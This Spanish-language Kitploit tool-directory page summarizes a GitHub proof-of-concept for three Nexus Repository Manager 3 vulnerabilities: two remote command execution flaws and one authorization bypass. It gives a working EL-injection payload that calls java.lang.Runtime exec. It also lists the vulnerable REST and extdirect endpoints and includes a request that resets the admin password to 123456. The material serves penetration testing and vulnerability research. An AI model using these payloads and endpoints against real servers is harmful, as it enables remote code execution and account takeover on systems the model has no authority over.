Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-10199 — CVE-2020-10199、CVE-2020-10204、CVE-2020-11444 | Kitploit
Herramientas/GitHubGitHub/jas502n/cve-2020-10199
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubjas502n/cve-2020-10199

CVE-2020-10199

CVE-2020-10199、CVE-2020-10204、CVE-2020-11444

Ver Repositorio
359hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de Nexus Repository Manager 3 (Versiones afectadas: <= 3.21.2)

CVE-2020-10199, CVE-2020-10204, CVE-2020-11444

CVE-2020-10199: Ejecución remota de comandos

PoC con respuesta

PoC sin respuesta

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}

Permisos de usuario normal

root@kitploit:~
/service/rest/beta/repositories/go/group

Requiere permisos de administrador

  1. Crear CleanupPolicy

/service/extdirect

  1. Crear repositorios

/service/rest/beta/repositories/apt/hosted

CVE-2020-10204: Ejecución remota de comandos

  1. Usar la interfaz de actualización de usuario

/service/extdirect

  1. Usar la interfaz de creación de roles

/service/extdirect

CVE-2020-11444: Vulnerabilidad de omisión de autorización

Llamar a la interfaz de actualización de roles

root@kitploit:~
/service/rest/beta/security/users/admin/change-password

POST:
123456

Enlaces de referencia

https://www.cnblogs.com/magic-zero/p/12641068.html

https://github.com/threedr3am/learnjavabug/tree/93d57c428333f98b5927d02630737e639dcb226b/nexus

Descargar herramienta